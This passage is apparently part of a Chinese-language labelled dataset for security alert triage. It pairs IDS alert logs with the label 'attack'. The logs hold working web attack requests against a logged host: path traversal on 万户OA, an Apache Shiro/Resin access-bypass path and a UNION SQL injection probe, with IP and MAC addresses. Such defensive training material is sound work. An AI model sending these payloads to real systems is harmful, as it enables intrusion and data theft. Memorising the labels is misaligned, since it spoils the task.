"R0VUIC9kZWZhdWx0cm9vdC9Eb3dubG9hZFNlcnZsZXQ/bW9kZVR5cGU9MiZwYXRoPWh0bWwmRmlsZU5hbWU9Li5cLi5cbG9naW4uanNwJm5hbWU9MTIzJmZpZXd2aWV3ZG93bmxvYWQ9MiZjZD1pbmxpbmUmZG93bmxvYWRBbGw9MiBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "万户OA存在任意文件下载漏洞,泄露的信息包括用户的账号密码信息。", "file_md5": "", "host": "218.76.15.56:30001", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/DownloadServlet", "first_access_time": "2024-11-27 14:15:42", "hazard_level": "6", "accept-language": "en-US,en;q=0.9", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "万户OA 任意文件下载漏洞", "alarm_sip": "172.23.68.194", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "d3d81d735c995935a61972534c6123e2", "proto": "http", "xff": "", "alarm_id": "20241127_1d51bd832d86211361f3ab491349bdfb", "vuln_desc": "万户OA存在任意文件下载漏洞,泄露的信息包括用户的账号密码信息。", "attack_chain": "0x02020000", "access_time": "2024-11-27 14:15:42", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16120000", "vuln_harm": "攻击者可以通过此漏洞下载系统敏感信息文件", "dip_addr": "局域网", "dport": "30001", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732688122", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "public_date": "2022-07-06 17:14:05", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "62", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020fd7", "req_header": "GET /defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570583-万户OA 任意文件下载漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "sport": "11781", "h_url": "/defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688142", "vlan_id": "", "vuln_type": "路径穿越攻击(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "目录遍历", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "目录遍历", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732688142, "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2", "dport": 30001, "vuln_name": "路径穿越攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "public_date": "2020-11-25 19:44:53", "sport": 11781}, "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入,对输入参数过滤../等字符。\r\n3.合理配置web服务器的目录权限,禁止目录遍历。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9Eb3dubG9hZFNlcnZsZXQ/bW9kZVR5cGU9MiZwYXRoPWh0bWwmRmlsZU5hbWU9Li5cLi5cbG9naW4uanNwJm5hbWU9MTIzJmZpZXd2aWV3ZG93bmxvYWQ9MiZjZD1pbmxpbmUmZG93bmxvYWRBbGw9MiBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "file_md5": "", "host": "218.76.15.56:30001", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/DownloadServlet", "first_access_time": "2024-11-27 14:15:42", "hazard_level": "4", "accept-language": "en-US,en;q=0.9", "hazard_rating": "中危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "路径穿越攻击(机器学习)", "alarm_sip": "172.23.68.194", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "73ed63534b4802be01885ac668a0544d", "proto": "http", "xff": "", "alarm_id": "20241127_e4f68be2f46c584583e814af9162ba79", "vuln_desc": "通过机器学习方式,检测到访问中存在路径穿越攻击或扫描代码。", "attack_chain": "0x02010000", "access_time": "2024-11-27 14:15:42", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "vuln_harm": "路径穿越攻击可以泄露敏感文件信息。", "dip_addr": "局域网", "dport": "30001", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732688122", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "public_date": "2020-11-25 19:44:53", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6b", "req_header": "GET /defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569451-路径穿越攻击(机器学习)", "rule_labels": "{}", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "sport": "11781", "h_url": "/defaultroot/DownloadServlet?modeType=2&path=html&FileName=..\\..\\login.jsp&name=123&fiewviewdownload=2&cd=inline&downloadAll=2", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688141", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "非授权访问/权限绕过", "_origin": {"write_date": 1732688141, "vuln_harm": "当在Spring Boot中使用Apache Shiro时,攻击者可以构造特定的HTTP请求绕过身份验证访问后台功能。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 37, "uri": "/resin-doc/;/WEB-INF/resin-web.xml", "dport": 30001, "vuln_name": "Apache Shiro权限绕过漏洞(CVE-2020-1957/CVE-2020-11989)", "rsp_status": 0, "code_language": "", "solution": "目前官方已在最新版本中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接:https://shiro.apache.org/download.html", "hit_start": 17, "detail_info": "Apache Shiro是⼀个强⼤且易⽤的Java安全框架,执⾏身份验证、授权、密码和会话管理。使⽤Shiro的易于理解的API,您可以快速、轻松地获得任何应⽤程序,从最⼩的移动应⽤程序到最⼤的⽹络和企业应⽤程序。\r\n在 Spring Boot 中使用1.5.3之前 Apache Shiro 时,特制的 HTTP 请求将导致身份验证绕过漏洞。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "Apache Shiro是⼀个强⼤且易⽤的Java安全框架,执⾏身份验证、授权、密码和会话管理。使⽤Shiro的易于理解的API,您可以快速、轻松地获得任何应⽤程序,从最⼩的移动应⽤程序到最⼤的⽹络和企业应⽤程序。\r\n在 Spring Boot 中使用1.5.3之前 Apache Shiro 时,特制的 HTTP 请求将导致身份验证绕过漏洞。", "public_date": "2021-12-15 19:17:28", "sport": 11779}, "detail_info": "Apache Shiro是⼀个强⼤且易⽤的Java安全框架,执⾏身份验证、授权、密码和会话管理。使⽤Shiro的易于理解的API,您可以快速、轻松地获得任何应⽤程序,从最⼩的移动应⽤程序到最⼤的⽹络和企业应⽤程序。\r\n在 Spring Boot 中使用1.5.3之前 Apache Shiro 时,特制的 HTTP 请求将导致身份验证绕过漏洞。", "file_md5": "6f5beb9a1703ee34294eadd0ac7db8ac", "rule_key": "webids", "api": "218.76.15.56:30001/resin-doc/;/WEB-INF/resin-web.xml", "first_access_time": "2024-11-27 14:15:41", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache Shiro权限绕过漏洞(CVE-2020-1957/CVE-2020-11989)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "4c4d541ffb550cec01ee492054c319c9", "xff": "", "vuln_desc": "Apache Shiro是⼀个强⼤且易⽤的Java安全框架,执⾏身份验证、授权、密码和会话管理。使⽤Shiro的易于理解的API,您可以快速、轻松地获得任何应⽤程序,从最⼩的移动应⽤程序到最⼤的⽹络和企业应⽤程序。\r\n在 Spring Boot 中使用1.5.3之前 Apache Shiro 时,特制的 HTTP 请求将导致身份验证绕过漏洞。", "attack_chain": "0x02010000", "vuln_harm": "当在Spring Boot中使用Apache Shiro时,攻击者可以构造特定的HTTP请求绕过身份验证访问后台功能。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688120", "code_language": "", "public_date": "2021-12-15 19:17:28", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "37", "h_proto_version": "HTTP/1.1", "uri": "/resin-doc/;/WEB-INF/resin-web.xml", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020e34", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Apache Shiro权限绕过漏洞(CVE-2020-1957/CVE-2020-11989)", "attack_type": "非授权访问/权限绕过", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "目前官方已在最新版本中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载链接:https://shiro.apache.org/download.html", "hit_start": "17", "skyeye_id": "", "payload": {"req_header": "R0VUIC9yZXNpbi1kb2MvOy9XRUItSU5GL3Jlc2luLXdlYi54bWwgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_0645580ad6a80176b33438086bdf06ed", "access_time": "2024-11-27 14:15:41", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16040000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/resin-doc/;/WEB-INF/resin-web.xml", "src_mac": "00:94:a1:5e:6e:87", "file_name": "resin-web.xml", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /resin-doc/;/WEB-INF/resin-web.xml HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570164-Apache Shiro权限绕过漏洞(CVE-2020-1957/CVE-2020-11989)", "rule_labels": "{\"0x10070d\": {\"parent_id\": \"0x100700\", \"type\": \"服务类型\", \"name\": \"其他\", \"parent_name\": \"未授权访问\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11779", "h_url": "/resin-doc/;/WEB-INF/resin-web.xml"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688140", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688140, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 305, "uri": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--", "dport": 30001, "vuln_name": "SQL注入(词法语法)", "rsp_status": 0, "code_language": "通用", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 285, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2019-10-18 10:02:18", "sport": 11771}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "82e2f99d50565a9b3c1be03ae99dc9e8", "rule_key": "webids", "api": "218.76.15.56:30001/webservice/get_usedspace.php", "first_access_time": "2024-11-27 14:15:40", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入(词法语法)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "0c834ea89e266ad5c96cd6752cfa6fc4", "site_id": "-1159 UNION ALL SELECT md5(691)--", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688120", "code_language": "通用", "public_date": "2019-10-18 10:02:18", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "305", "h_proto_version": "HTTP/1.1", "uri": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002072c", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入(词法语法)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "285", "skyeye_id": "", "payload": {"req_header": "R0VUIC93ZWJzZXJ2aWNlL2dldF91c2Vkc3BhY2UucGhwP3NpdGVfaWQ9LTExNTklMjBVTklPTiUyMEFMTCUyMFNFTEVDVCUyMG1kNSg2OTEpLS0gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a26776019a957230db5d282c662a3d49", "access_time": "2024-11-27 14:15:40", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/webservice/get_usedspace.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "get_usedspace.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568364-SQL注入(词法语法)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11771", "h_url": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688140", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688140, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 56, "uri": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--", "dport": 30001, "vuln_name": "SQL注入攻击", "rsp_status": 0, "code_language": "其他", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 36, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2018-08-08 12:00:00", "sport": 11771}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "82e2f99d50565a9b3c1be03ae99dc9e8", "rule_key": "webids", "api": "218.76.15.56:30001/webservice/get_usedspace.php", "first_access_time": "2024-11-27 14:15:40", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "3961ad2c6852d4a0c6e86a9b99ba0c58", "site_id": "-1159 UNION ALL SELECT md5(691)--", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688120", "code_language": "其他", "public_date": "2018-08-08 12:00:00", "skyeye_serial_num": "QbJK/8ze/", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "56", "h_proto_version": "HTTP/1.1", "uri": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001483", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "36", "skyeye_id": "", "payload": {"req_header": "R0VUIC93ZWJzZXJ2aWNlL2dldF91c2Vkc3BhY2UucGhwP3NpdGVfaWQ9LTExNTklMjBVTklPTiUyMEFMTCUyMFNFTEVDVCUyMG1kNSg2OTEpLS0gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_962ec0c610d9aa7921b8fe65257eebbb", "access_time": "2024-11-27 14:15:40", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/webservice/get_usedspace.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "get_usedspace.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: 